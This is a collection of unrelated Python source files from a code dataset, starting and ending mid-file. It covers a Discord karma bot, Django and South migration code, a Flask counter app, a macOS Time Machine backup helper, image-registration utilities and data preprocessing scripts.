retrieved_data = multicache.get(cache_key)\n\n # test\n self.assertEqual(cache_data.keys().sort(), retrieved_data.keys().sort())\n\n def test_simple_multi_cache(self):\n \"\"\"this should just save using memcache\"\"\"\n # cache params\n cache_key = 'test_simple_multi_cache'\n cache_len = 60\n\n # prepare cache data and save\n cache_data = self.get_cache_data(5000)\n multicache.set(cache_key, cache_data, cache_len)\n\n # retrieve data\n retrieved_data = multicache.get(cache_key)\n\n # test\n self.assertEqual(cache_data.keys().sort(), retrieved_data.keys().sort())\n\n def test_split_string_into_parts(self):\n num_parts = 3\n test_cases = [\n ('123456789012345678901234567890', ['1234567890'] * 3),\n ('1234567890', ['123', '456', '7890']),\n ]\n for case in test_cases:\n split_string = list(multicache.split_string_into_parts(case[0], 3))\n self.assertEqual(split_string, case[1])\n\n\n #\n # Smoke Tests\n #\n def testInstance(self):\n \"\"\"adapt to your purposes, I like to always include this as a sanity check\"\"\"\n self.assertTrue(isinstance(self, AppswellUnitTest))\n\n\n#\n# Main\n#\nif __name__ == \"__main__\":\n run_test_from_command_line(MulticacheTest)\n","sub_path":"appspot/project/test/unit/test_multicache.py","file_name":"test_multicache.py","file_ext":"py","file_size_in_byte":4987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"438013054","text":"import random\n\nimport discord\nfrom discord.ext import commands\nfrom discord.ext.commands import Context\n\nfrom backend import database\n\n\nclass Fun(commands.Cog):\n def __init__(self, bot: commands.Bot):\n self.enabled = True\n self.bot = bot\n\n @commands.Cog.listener()\n async def on_message(self, message: discord.Message):\n if not self.enabled:\n return\n if message.author.bot:\n return\n if not random.randint(0, 100) == 50:\n return\n await message.add_reaction(\"<:tutkegel:620927895132569601>\")\n\n @commands.command(hidden=True)\n async def toggle(self, ctx):\n self.enabled = not self.enabled\n await ctx.send(f\"Set enabled to: {self.enabled}\")\n\n # Send 3x3 emote grid with tutkegel.\n # Emotes are from Davvos11's test discord,\n # therefore, there isn't a need to waste emote space on the TCS discord\n @commands.command(name=\"tutkegel\")\n async def tutkegel(self, ctx):\n await ctx.send(\"<:tegel9:634119527680180261>\"\n \"<:tegel8:634119528158199841>\"\n \"<:tegel7:634119527927513089>\"\n \"\\n<:tegel6:634119527868661773>\"\n \"<:tegel5:634119527877050399>\"\n \"<:tegel4:634119528346812429>\"\n \"\\n<:tegel3:634119528825094164>\"\n \"<:tegel2:634119528330035200>\"\n \"<:tegel1:634119528439218206>\")\n\n # Send the leaderboards in the following format:\n # {ranking}. {name} - {positives} Positives and {negatives} Negatives\n @commands.command(name='wiezijnhetmooist',\n aliases=['whoarehetmooist', 'spiegeltjespiegeltjeaandewand'])\n async def on_karma_leaderboard_request(self, ctx: Context):\n message = '\\n'.join([f'{x[0] + 1}. {self.bot.get_user(x[1][0]).name} - '\n f'{x[1][1]} Positives and {x[1][2]} Negatives'\n for x in enumerate(await database.get_top_karma(10))])\n await ctx.send(message if message else 'Nobody is mooi')\n\n # Send a current status for a given player in the following format:\n # {mention} - You currently have {positives} Positives and {negatives} Negatives\n @commands.command(name='hoemooibenik', aliases=['howmooiami'])\n async def on_karma_self_request(self, ctx: Context):\n author: discord.User = ctx.author\n response: (int, int) = await database.get_karma(author.id)\n await ctx.send(f'{author.mention} - You currently have: {response[0]} '\n f'Positives and {response[1]} Negatives')\n\n @commands.Cog.listener()\n async def on_reaction_add(self, reaction: discord.Reaction, member: discord.Member):\n await self.change_count(reaction, member, True)\n\n @commands.Cog.listener()\n async def on_reaction_remove(self, reaction: discord.Reaction, member: discord.Member):\n await self.change_count(reaction, member, False)\n\n class KarmaEmotes(discord.Enum):\n POSITIVE = 'dasmooi'\n NEGATIVE = 'dasnietmooi'\n\n # Check if the karma count should be changed, if so, change it\n async def change_count(self, reaction: discord.Reaction, member: discord.Member,\n increment: bool):\n # Check if the user doesn't want to give karma to themselves.\n # It is also important that Tegel's opinion doesn't count.\n if self.enabled and member != reaction.message.author \\\n and not discord.utils.get(member.roles, name='Tegel'):\n emoji: discord.emoji.Emoji = reaction.emoji\n # Check if the emoji is a karma emoji\n if type(emoji) == discord.emoji.Emoji:\n if emoji.name == self.KarmaEmotes.POSITIVE.value:\n # Update the positive karma\n await database.update_karma(reaction.message.author.id,\n (1 if increment else -1, 0))\n elif emoji.name == self.KarmaEmotes.NEGATIVE.value:\n # Update the negative karma\n await database.update_karma(reaction.message.author.id,\n (0, 1 if increment else -1))\n\n # Replies \"Alexa, play Despacito\" to messages containing \"this is so sad\"\n @commands.Cog.listener()\n async def on_message(self, message: discord.Message):\n if not self.enabled:\n return\n if message.author.bot:\n return\n if not \"this is so sad\" in message.content.lower():\n return\n await message.channel.send(\"Alexa, play Despacito\")\n\ndef setup(bot):\n bot.add_cog(Fun(bot))\n","sub_path":"cogs/fun.py","file_name":"fun.py","file_ext":"py","file_size_in_byte":4699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"479954273","text":"\n\nfrom xai.brain.wordbase.nouns._fathead import _FATHEAD\n\n#calss header\nclass _FATHEADS(_FATHEAD, ):\n\tdef __init__(self,): \n\t\t_FATHEAD.__init__(self)\n\t\tself.name = \"FATHEADS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"fathead\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_fatheads.py","file_name":"_fatheads.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"247037090","text":"# -*- coding: utf-8 -*-\nfrom south.utils import datetime_utils as datetime\nfrom south.db import db\nfrom south.v2 import SchemaMigration\nfrom django.db import models\n\n\nclass Migration(SchemaMigration):\n\n def forwards(self, orm):\n # Deleting field 'Currency.name'\n db.delete_column(u'currency_currency', 'name')\n\n # Adding field 'Currency.name_es'\n db.add_column(u'currency_currency', 'name_es',\n self.gf('django.db.models.fields.CharField')(default=None, max_length=50, null=True, blank=True),\n keep_default=False)\n\n # Adding field 'Currency.name_en'\n db.add_column(u'currency_currency', 'name_en',\n self.gf('django.db.models.fields.CharField')(default=None, max_length=50, null=True, blank=True),\n keep_default=False)\n\n # Adding unique constraint on 'Currency', fields ['code']\n db.create_unique(u'currency_currency', ['code'])\n\n\n def backwards(self, orm):\n # Removing unique constraint on 'Currency', fields ['code']\n db.delete_unique(u'currency_currency', ['code'])\n\n # Adding field 'Currency.name'\n db.add_column(u'currency_currency', 'name',\n self.gf('django.db.models.fields.CharField')(default=None, max_length=50),\n keep_default=False)\n\n # Deleting field 'Currency.name_es'\n db.delete_column(u'currency_currency', 'name_es')\n\n # Deleting field 'Currency.name_en'\n db.delete_column(u'currency_currency', 'name_en')\n\n\n models = {\n u'currency.currency': {\n 'Meta': {'object_name': 'Currency'},\n 'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '3'}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'name_en': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '50', 'null': 'True', 'blank': 'True'}),\n 'name_es': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '50', 'null': 'True', 'blank': 'True'}),\n 'symbol': ('django.db.models.fields.CharField', [], {'max_length': '3'}),\n 'value': ('django.db.models.fields.DecimalField', [], {'max_digits': '10', 'decimal_places': '2'})\n }\n }\n\n complete_apps = ['currency']","sub_path":"poppurri/currency/migrations/0002_auto__del_field_currency_name__add_field_currency_name_es__add_field_c.py","file_name":"0002_auto__del_field_currency_name__add_field_currency_name_es__add_field_c.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"465458201","text":"#!/opt/homebrew/bin/python3\n# -*- coding: utf-8 -*-\n# Time Machine Traveler Helper\n# v1.0\n# Pavel Zhovner\n# zhovner\n# https://user-images.githubusercontent.com/774290/132701329-36b01255-50f4-4902-8ea3-0088edb38b2b.jpg\n# Helps run remote Time Machine. Test network speed to SMB server and start backup only if SMB server is speed enough.\n# python3,iperf3,osascript\n#\n#string(SMB_SHARE_ADDRESS=\"\"): Your SMB share address\n#string(WORKGROUP_NAME=\"\"): Your SMB share address\n#string(SMB_MOUNT_PATH=\"\"): Your SMB share address\n#string(SMB_USER=\"\"): Your SMB share address\n#string(SMB_SHARE_PATH=\"\"): Your SMB share address\n#string(SPEED_TEST_SERVER=\"\"): Your SMB share address\n#string(SPEED_TEST_DURATION=\"\"): Your SMB share address\n#string(SPEED_TEST_TIMEOUT=\"\"): Your SMB share address\n#string(MIN_SPEED=\"\"): Your SMB share address\n#string(MAX_LOAD_AVERAGE=\"\"): Your SMB share address\n\n\n### Requirements\n# brew install python3 iperf3\n# pip3 install osascript\n\n### How to use:\n# 1. Mount remote SMB share and save credentials in system keychain\n# 2. Configure Time Machine to SMB share in System Preferences. Make sure that first backup is created correctly\n# 3. Disable automatic backup in Time Machine\n# 4. Setup this script \n\nimport subprocess\nimport json\nimport glob \nimport os\nimport time\nimport sys\nimport datetime\n\n# If you still have this error after install osascript, try to set right python3 shell bang\ntry:\n import osascript\nexcept ImportError:\n generate_output('''Can't import osascript module\nRun: pip3 install osascript''', status='FATAL_ERROR')\n\n\ndef generate_output(message, status):\n\n if status == 'FATAL_ERROR':\n print(\"⚠️\")\n print(\"---\")\n print(\"Time Machine Travel Helper | font=LucidaGrande-Bold\")\n print(\"---\")\n print(\"Fatal error:\")\n print(message)\n\n if status == 'IDLE':\n print(\"🕒\")\n print(\"---\")\n print(\"Time Machine Travel Helper | font=LucidaGrande-Bold\")\n # TODO: Show latest backup date\n print(\"Last Run: \" + datetime.datetime.now().strftime(\"%d %b %Y - %H:%M\") + \" | size=10\")\n print(\"---\")\n print(message)\n print(\"Skipping backup...\")\n\n if status == 'RUN':\n print(\"🌀\")\n print(\"---\")\n print(\"Time Machine Travel Helper | font=LucidaGrande-Bold\")\n print(\"---\")\n # TODO: Show backup status and progress\n print(\"Backuping...\")\n\n # Manually run button\n print(\"---\")\n print(\"Run now | refresh=true\")\n\n # Trying to print some logs if we have some\n try: \n # Output log in dropdown menu\n print(\"Logs\")\n \n # Current time machine path settings\n print(\"-- Time Machine Settings:\")\n for l in TMUTIL_SETTINGS.splitlines():\n print(\"-- \" + l)\n\n # SMB status\n\n # Display upload speed\n if UPLOAD_SPEED:\n print(\"-- \")\n print(\"-- Speed Test to: \" + SPEED_TEST_SERVER)\n print(\"-- ====================================================\")\n print(\"-- Upload Speed: \" + str(UPLOAD_SPEED) + \" Mbits/sec\")\n \n # List Time Machine bundles files\n print(\"-- \")\n print(\"-- Found \" + str(len(TIME_MACHINE_BACKUPS)) + \" Time Machine files:\")\n print(\"-- ====================================================\")\n for l in TIME_MACHINE_BACKUPS:\n print(\"-- \" + str(l))\n except:\n pass\n\n # Stop script after print logs\n # we need to always exit with 0 because of xbar\n exit(0)\n\n\n\n# Settings VARIABLES\n# ---------------------------------------------------------------\n\nSMB_SHARE_ADDRESS = os.environ[\"SMB_SHARE_ADDRESS\"]\nWORKGROUP_NAME = os.environ[\"WORKGROUP_NAME\"]\nSMB_MOUNT_PATH = os.environ[\"SMB_MOUNT_PATH\"]\nSMB_USER = os.environ[\"SMB_USER\"]\nSMB_SHARE_PATH = os.environ[\"SMB_SHARE_PATH\"]\n\nSPEED_TEST_SERVER = os.environ[\"SPEED_TEST_SERVER\"]\nSPEED_TEST_DURATION = os.environ[\"SPEED_TEST_DURATION\"]\nSPEED_TEST_TIMEOUT = os.environ[\"SPEED_TEST_TIMEOUT\"]\n\nMIN_SPEED = os.environ[\"SPEED_TEST_TIMEOUT\"]\nMAX_LOAD_AVERAGE = int(os.environ[\"SPEED_TEST_TIMEOUT\"])\n\n# ---------------------------------------------------------------\n\n\n#### Script exit status to draw correct icon\nSTATUS = \"\"\n\n#### Print Time Mahcine settings\nTMUTIL_SETTINGS_SUB = subprocess.run([\"tmutil\", \"destinationinfo\"], capture_output=True)\nTMUTIL_SETTINGS = (str(TMUTIL_SETTINGS_SUB.stdout, 'utf-8'))\n# Stop if Time Machine not configured\nif \"No destinations configured\" in TMUTIL_SETTINGS:\n generate_output(\"Time Machine not configured\",status='FATAL_ERROR')\n\n\n#### Check Load Average. Exit if system busy\nLA = round(os.getloadavg()[0])\nif LA > MAX_LOAD_AVERAGE:\n generate_output(\"System load is to high.\",status='IDLE')\n\n\n#### Check if Time Machine running\n# exit if backup running\n#\n# TODO: Display running progress\n#\n# Use python tmutil function if need more info from running time machine process\n# https://gist.github.com/andrewbenson/cc5fd79ff6999f0524b8979fe17937a3\n#\nTMUTIL_PHASE_SUB = subprocess.run([\"tmutil\", \"currentphase\"], capture_output=True)\nTMUTIL_PHASE = str(TMUTIL_PHASE_SUB.stdout, 'utf-8').strip()\nif TMUTIL_PHASE != \"BackupNotRunning\":\n generate_output(\"Backup is running...\",status='RUN')\n\n\n#### Check if SMB share availible \nSMBUTIL_SUB = subprocess.run([\"smbutil\", \"status\", SMB_SHARE_ADDRESS], capture_output=True)\nSMB_CHECK_RESULT = str(SMBUTIL_SUB.stdout, 'utf-8').strip()\n\n# Check if SMB share connect have workgoup name\n# Oterwise stop because SMB share not reacheble\nif WORKGROUP_NAME not in SMB_CHECK_RESULT:\n generate_output(\"SMB \" + SMB_SHARE_ADDRESS + \" not availible.\",status='IDLE')\n\n\n#### Run Network Speed Test\n# ---------------------------------------------------------------\ntry:\n IPERF_SUB = subprocess.run(\n [\"/opt/homebrew/bin/iperf3\",\n \"--connect-timeout\", SPEED_TEST_TIMEOUT, # Drop connection in laggy network\n \"--time\", SPEED_TEST_DURATION, # Run speed test shorter then default 10 seconds\n \"--json\", # Output in JSON format\n \"--client\", SPEED_TEST_SERVER], # Connects to Speed Test server in client mode\n capture_output=True)\nexcept:\n generate_output(\"iperf3 failed to run\",status='FATAL_ERROR')\n\n# Convert iperf3 output to valid JSON\nIPERF_RESULT = str(IPERF_SUB.stdout, 'utf-8') # Convert bytes to string\nIPERF_JSON = json.loads(IPERF_RESULT)\n# Exit if error key found \nif \"error\" in IPERF_JSON:\n generate_output(\"iperf3: \" + IPERF_JSON[\"error\"],status='FATAL_ERROR')\n\n# Else calculate the upload speed and decide if it's enough to start Time Machine\nelse:\n USPEED_FLOAT = IPERF_JSON[\"end\"][\"sum_sent\"][\"bits_per_second\"]\n UPLOAD_SPEED = round(USPEED_FLOAT) // 1000000\n if int(UPLOAD_SPEED) < int(MIN_SPEED):\n generate_output(\"Internet is too slow: \" + str(UPLOAD_SPEED) + \" Mbits/sec\\n\" + \"Minimum is: \" + str(MIN_SPEED) + \" Mbits/sec\",status='IDLE') \n\n\n#### Mounting SMB share if not mounted. Using osascript (hardest part)\nif not os.path.isdir(SMB_MOUNT_PATH):\n #print(SMB_MOUNT_PATH + \" not founded. Trying to mount...\")\n OSA_ARGS = 'tell application \"Finder\" to mount volume ' + '\"smb://' + SMB_USER + '@' + SMB_SHARE_ADDRESS + '/' + SMB_SHARE_PATH + '\"'\n osacode,osaout,osaerr = osascript.run(OSA_ARGS)\n #time.sleep(1)\n\n# Looking for a SMB Path again after mount \nif not os.path.isdir(SMB_MOUNT_PATH):\n generate_output(\"Mount \" + SMB_MOUNT_PATH + \" Failed\",status='FATAL_ERROR')\n #print(\"Command used to mount via osascript: \" + str(OSA_ARGS))\n\n\n#### Looking for *.sparsebundle files on SMB share\n# exit if not founded\n# Create Time Machine backup manually before using this script\nTIME_MACHINE_BACKUPS = glob.glob(SMB_MOUNT_PATH + \"/*.sparsebundle\")\nif not TIME_MACHINE_BACKUPS:\n print_error(\"Time Machine files not found on SMB share.\\n Run Time Machine first time manually before using this script\")\n\n#### Run Time Machine backup\nTIME_MACHINE_SUB = subprocess.run(\n [\"tmutil\",\n \"startbackup\"],\n capture_output=True)\n\nif TIME_MACHINE_SUB.returncode != 0:\n #print(\"ERROR: Time Machine Starting Failed!\")\n #osacode,osaout,osaerr = osascript.run('display notification \"⚠️ ERROR: Time Machine Starting Failed!\" with Title \"Time Machine Helper\"')\n print_error('Time Machine start failed\\n run: \"tmutil startbackup\" in terminal')\n\n### Check if Time Machine really starts backup\nTMUTIL_PHASE_SUB = subprocess.run([\"tmutil\", \"currentphase\"], capture_output=True)\nTMUTIL_PHASE = str(TMUTIL_PHASE_SUB.stdout, 'utf-8').strip()\nif 'BackupNotRunning' in TMUTIL_PHASE:\n generate_output('Time Machine not started\\n Run manually: \\\"tmutil startbackup\\\" in terminal',status='FATAL_ERROR')\n\n# Generate output\n# ---------------------------------------------------------------\n\ngenerate_output(\"\",status='RUN')","sub_path":"Network/time_machine_traveler.py","file_name":"time_machine_traveler.py","file_ext":"py","file_size_in_byte":9260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"265037975","text":"def summ(x,y,z):\n\tif x == y and y == z:\n\t\tprint (\"All munbers is equal, and summ multiplied by 3 is: \", (x+y+z)*3)\n\telse:\n\t\tprint (\"The summ of three numbers: \", x+y+z )\n\n\nsumm(1,2,3)\nsumm(4,4,4)\nsumm(5,5,6)\n\n\n\n\ndef sum_thrice(x, y, z):\n\n sum = x + y + z\n \n if x == y == z:\n sum = sum * 3\n return sum\n\nprint(sum_thrice(1, 2, 3))\nprint(sum_thrice(3, 3, 3))\n","sub_path":"18_calculating_sum.py","file_name":"18_calculating_sum.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"635751706","text":"from django.db import models\n\nfrom uuidfield import UUIDField\n\n\nclass Room(models.Model):\n\tid = UUIDField(\n\t\tprimary_key=True,\n\t\tauto=True\n\t)\n\troom_name = models.CharField(\n\t\tmax_length=200,\n\t\tblank=False,\n\t\tnull=False,\n\t)","sub_path":"rooms/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"119557515","text":"#!/usr/bin/env python3\nfrom flask import Flask, json, render_template\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\ndistro_list = {}\ntry:\n f = open(\"semester.txt\", \"r\")\n sem = \"the \" + f.read() + \" \"\n f.close()\nexcept:\n sem = \"\"\n\n\ndef load():\n global distro_list\n try:\n file = open('saved.json', 'r')\n distro_list = json.loads(file.read())\n print('loaded: '+str(distro_list))\n except: \n print('No saved distro list detected; a new one will be created on insert.')\n return 'data loaded';\n\ndef save():\n global distro_list\n tosave = json.dumps(distro_list);\n file = open('saved.json', 'w')\n file.write(tosave)\n file.close()\n return 'data saved';\n\n@app.route('/api/v1/add/', methods=['POST', 'GET'])\ndef add_distro(distro):\n global distro_list\n # add distro to distro_list\n if distro in distro_list:\n distro_list[distro] = distro_list[distro]+1;\n else:\n distro_list[distro] = 1;\n #socketio.emit('remote_distro_change', {distro: distro_list[distro]}, namespace='/distroupdates')\n save()\n return ''\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n@app.route('/api/v1/term')\ndef term():\n global sem\n return sem\n\n@app.route('/api/v1/distrolist')\ndef getDistrolist():\n global distro_list\n print('distrolist request: '+str(distro_list))\n distros = DistroList(distro_list);\n return json.dumps(distros.__dict__);\n\nclass DistroList:\n def __init__(self, distdict):\n self.distros = distdict\n\nload()\nprint('script started')\n\n\nif __name__ == '__main__':\n Flask.run(app)\n","sub_path":"sczi/installfest-counter/installfest-serve.py","file_name":"installfest-serve.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"412314183","text":"'''\n'''\n\n\nimport os\n\nimport nornir_imageregistration\nimport nornir_imageregistration.files.stosfile\nfrom scipy import pi\n\nimport numpy as np\n\n\nclass AlignmentRecord:\n '''\n Records basic registration information as an angle and offset between a fixed and moving image\n If the offset is zero the center of both images occupy the same point. \n The offset determines the translation of the moving image over the fixed image.\n There is no support for scale, and there should not be unless added as another variable to the alignment record\n \n :param array peak: Translation vector for moving image\n :param float weight: The strength of the alignment\n :param float angle: Angle to rotate moving image in degrees\n \n '''\n\n @property\n def angle(self):\n '''Rotation in degrees'''\n return self._angle\n\n @property\n def rangle(self):\n '''Rotation in radians'''\n return self._angle * (pi / 180.0)\n\n @property\n def weight(self):\n '''Quantifies the quality of the alignment'''\n return self._weight\n \n @weight.setter\n def weight(self, value):\n self._weight = value\n\n @property\n def peak(self):\n '''Translation vector for the alignment'''\n return self._peak\n\n def WeightKey(self):\n return self._weight\n\n def scale(self, value):\n '''Scales the peak position'''\n self._peak = self._peak * value\n\n def translate(self, value):\n '''Translates the peak position using tuple (Y,X)'''\n self._peak = self._peak + value\n\n def Invert(self):\n '''\n Returns a new alignment record with the coordinates of the peak reversed\n Used to change the frame of reference of the alignment from one tile to another\n '''\n return AlignmentRecord((-self.peak[0], -self.peak[1]), self.weight, self.angle)\n\n def __str__(self):\n s = 'angle: ' + str(self._angle) + ' offset: ' + str(self._peak) + ' weight: ' + str(self._weight)\n return s\n\n def __init__(self, peak, weight, angle=0.0):\n if not isinstance(angle, float):\n angle = float(angle)\n\n self._angle = angle\n\n if not isinstance(peak, np.ndarray):\n peak = np.array(peak)\n\n self._peak = peak\n self._weight = weight\n\n def CorrectPeakForOriginalImageSize(self, FixedImageShape, MovingImageShape):\n\n if self.peak is None:\n self.peak = (0, 0)\n\n return nornir_imageregistration.transforms.factory.__CorrectOffsetForMismatchedImageSizes(FixedImageShape, MovingImageShape)\n\n\n def GetTransformedCornerPoints(self, warpedImageSize):\n '''\n \n '''\n return nornir_imageregistration.transforms.factory.GetTransformedRigidCornerPoints(warpedImageSize, self.rangle, self.peak)\n\n\n def ToTransform(self, fixedImageSize, warpedImageSize=None):\n '''\n :param (Height, Width) fixedImageSize: Size of translated image in fixed space\n :param (Height, Width) warpedImageSize: Size of translated image in warped space. If unspecified defaults to fixedImageSize\n :return: A rigid rotation+translation transform described by the alignment record\n '''\n\n if warpedImageSize is None:\n warpedImageSize = fixedImageSize\n\n return nornir_imageregistration.transforms.factory.CreateRigidTransform(fixedImageSize, warpedImageSize, self.rangle, self.peak)\n\n def __ToGridTransformString(self, fixedImageSize, warpedImageSize):\n\n transform = self.ToTransform(fixedImageSize, warpedImageSize)\n\n warpedSpaceCorners = nornir_imageregistration.transforms.factory.GetTransformedRigidCornerPoints(warpedImageSize, rangle=0, offset=(0, 0))\n\n fixedSpaceCorners = transform.Transform(warpedSpaceCorners)\n\n# list = [str(BotLeft.item(0)),\n# str(BotLeft.item(1)),\n# str(BotRight.item(0)),\n# str(BotRight.item(1)),\n# str(TopLeft.item(0)),\n# str(TopLeft.item(1)),\n# str(TopRight.item(0)),\n# str(TopRight.item(1))]\n\n string = \"\"\n\n fixedSpaceCorners = np.fliplr(fixedSpaceCorners)\n\n for s in fixedSpaceCorners.flat:\n string = string + ' %g' % s\n\n return string\n\n def ToStos(self, ImagePath, WarpedImagePath, FixedImageMaskPath=None, WarpedImageMaskPath=None, PixelSpacing=1):\n stos = nornir_imageregistration.files.stosfile.StosFile()\n stos.ControlImageName = os.path.basename(ImagePath)\n stos.ControlImagePath = os.path.dirname(ImagePath)\n\n stos.MappedImageName = os.path.basename(WarpedImagePath)\n stos.MappedImagePath = os.path.dirname(WarpedImagePath)\n\n if not FixedImageMaskPath is None:\n stos.ControlMaskName = os.path.basename(FixedImageMaskPath)\n stos.ControlMaskPath = os.path.dirname(FixedImageMaskPath)\n\n if not WarpedImageMaskPath is None:\n stos.MappedMaskName = os.path.basename(WarpedImageMaskPath)\n stos.MappedMaskPath = os.path.dirname(WarpedImageMaskPath)\n\n (ControlHeight, ControlWidth) = nornir_imageregistration.core.GetImageSize(ImagePath)\n stos.ControlImageDim = (ControlWidth, ControlHeight)\n\n (MappedHeight, MappedWidth) = nornir_imageregistration.core.GetImageSize(WarpedImagePath)\n stos.MappedImageDim = (MappedWidth, MappedHeight)\n\n # transformTemplate = \"FixedCenterOfRotationAffineTransform_double_2_2 vp 8 %(cos)g %(negsin)g %(sin)g %(cos)g %(x)g %(y)g 1 1 fp 2 %(mapwidth)d %(mapheight)d\"\n\n # stos.Transform = transformTemplate % {'cos' : cos(Match.angle * numpy.pi / 180),\n # 'sin' : sin(Match.angle * numpy.pi / 180),\n # 'negsin' : -sin(Match.angle * numpy.pi / 180),\n # 'x' : Match.peak[0],\n # 'y' : -Match.peak[1],\n # 'mapwidth' : stos.MappedImageDim[0]/2,\n # 'mapheight' : stos.MappedImageDim[1]/2}\n\n transformTemplate = \"GridTransform_double_2_2 vp 8 %(coordString)s fp 7 0 1 1 0 0 %(width)f %(height)f\"\n\n # We use Y,X ordering in memory due to Numpy. Ir-Tools coordinates are written X,Y.\n coordString = self.__ToGridTransformString((stos.ControlImageDim[1], stos.ControlImageDim[0]), (stos.MappedImageDim[1], stos.MappedImageDim[0]))\n\n stos.Transform = transformTemplate % {'coordString' : coordString,\n 'width' : stos.MappedImageDim[0] - 1,\n 'height' : stos.MappedImageDim[1] - 1}\n\n stos.Downsample = PixelSpacing\n\n# print \"Done!\"\n\n return stos\n","sub_path":"nornir_imageregistration/alignment_record.py","file_name":"alignment_record.py","file_ext":"py","file_size_in_byte":6832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"223900980","text":"\n\nfrom xai.brain.wordbase.verbs._debilitate import _DEBILITATE\n\n#calss header\nclass _DEBILITATING(_DEBILITATE, ):\n\tdef __init__(self,): \n\t\t_DEBILITATE.__init__(self)\n\t\tself.name = \"DEBILITATING\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"debilitate\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_debilitating.py","file_name":"_debilitating.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"643469627","text":"import os\nimport random\nimport pandas as pd\nimport numpy as np\nimport cv2\nimport math\nfrom pathlib import Path\n\nimport matplotlib.image as mpimg\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\n\ndata = pd.read_csv('driving_log.csv', index_col = False)\ndata.columns = ['centerImage', 'leftImage', 'rightImage', 'steering', 'throttle', 'brake', 'speed']\n\ndata1 = pd.read_csv('driving_log1.csv', index_col = False)\ndata1.columns = ['centerImage', 'leftImage', 'rightImage', 'steering', 'throttle', 'brake', 'speed']\n\nframes = [data, data1]\nfinalData = pd.concat(frames)\n\nvalid_data, train_data = np.split(finalData.sample(frac = 1), [int(len(data) * 0.2)])\n\ndel data\nprint(\"The Validation Data Shape\", valid_data.shape)\nprint(\"The training data shape \", train_data.shape)\n\n\ndef modifyBrightness(image):\n \"\"\"\n This functions increases the brightness. i.e It increases the contrast of the image.\n \"\"\"\n image = cv2.cvtColor(image,cv2.COLOR_RGB2HSV)\n brightness = 0.4 + np.random.uniform()\n image[:,:,2] = image[:,:,2]* brightness\n\n return cv2.cvtColor(image,cv2.COLOR_HSV2RGB)\n\nfig = plt.figure(figsize=(60, 80))\ngs = gridspec.GridSpec(3, 3)\n\ndef translateImage(image, angle = 0):\n \"\"\"\n This function translates the Images in different directions randomly.\n \"\"\"\n x = (80 * np.random.uniform()) - (80 * 0.5)\n y = (30 * np.random.uniform()) - (30 * 0.5)\n M = np.float32([[1,0,x],[0,1,y]])\n rows,cols,channels = image.shape\n image = cv2.warpAffine(image,M,(cols,rows))\n new_angle = angle + ((x/80)*2)*0.3\n\n return image, new_angle\n\ndef getCroppedAndResizedImage(image):\n \"\"\"\n This function crops the image such in order to remove the features in the SKY and shows only the road. And also it resizes the image in order to give it to the VGG Model.\n \"\"\"\n image = image[50:145,:,:]\n image = cv2.resize(image,(64,64),interpolation=cv2.INTER_AREA)\n image = np.array(image)\n\n return image\n\n\ni = 0\nfor g in gs:\n ax = fig.add_subplot(g)\n index = np.random.randint(len(train_data))\n temp = train_data.centerImage.iloc[index].strip()\n image = mpimg.imread(temp)\n image = getCroppedAndResizedImage(image)\n ax.set_title('Steering angle: %s - Data ' % (train_data.steering.iloc[index]) ,fontsize=10)\n ax.imshow(image)\n i = i + 1\ngs.tight_layout(fig)\nplt.show()\n","sub_path":"showImage.py","file_name":"showImage.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"611677669","text":"from bs4 import BeautifulSoup\nfrom wordcloud import WordCloud, STOPWORDS\nimport numpy as np\nfrom PIL import Image\nimport identify_xml\n\ndef verifyXML(XMLName):\n if '.xml' in XMLName:\n return 1\n else:\n return \"not an XML file\"\n\ndef openXML(xmlName):\n if verifyXML(xmlName) == 1:\n with open(list_of_xml[paper], 'r') as f:\n data = f.read()\n return data\n\ndef createWordcloud(cloudText, i):\n #FOR THE WORDCLOUD OF EACH PAPER\n\n #frequent words that dont need to be included\n stopwords = STOPWORDS\n stopwords.add(\"et\")\n stopwords.add(\"al\")\n #image for the cloud shape\n mask = np.array(Image.open(\"cloud_image.webp\"))\n\n #object for the wordcloud\n wc = WordCloud(background_color='white',stopwords=stopwords,height = 600,width=400, mask=mask)\n\n #generating the wordcloud\n wc.generate(cloudText)\n\n #creating an image of the wordcloud\n wc.to_file('./output_files/wordcloud_paper' + i + '.png')\n\n\nconcat = \"\"\ndata = \"\"\nconcat_ind = \"\"\n\ni = 1\n\nlist_of_xml = identify_xml.identifying_xml(\"./Papers\")\n\nfor paper in range(len(list_of_xml)):\n \n #Storing the returned information\n parser_data = BeautifulSoup(openXML(list_of_xml[paper]), 